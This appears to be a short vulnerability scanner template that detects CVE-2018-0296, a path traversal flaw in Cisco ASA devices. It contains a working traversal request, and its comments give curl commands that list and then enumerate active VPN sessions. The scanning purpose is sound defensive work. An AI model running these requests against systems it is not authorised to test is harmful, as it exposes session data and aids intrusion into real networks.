id: CVE-2018-0296 info: name: Cisco ASA path traversal vulnerability author: organiccrap severity: medium # https://github.com/yassineaboukir/CVE-2018-0296 # curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions # if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number requests: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" matchers-condition: and matchers: - type: word words: - "///sessions" part: body - type: status status: - 200